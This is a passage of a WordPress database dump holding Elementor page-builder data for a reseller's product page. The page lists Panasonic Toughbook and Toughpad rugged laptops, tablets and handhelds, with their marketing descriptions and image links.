FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3684,2683,'_elementor_version','0.4'),(3687,2684,'_elementor_edit_mode','builder'),(3688,2684,'_elementor_template_type','post'),(3689,2684,'_wp_page_template','template-fullwidth.php'),(3690,2684,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":50},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry 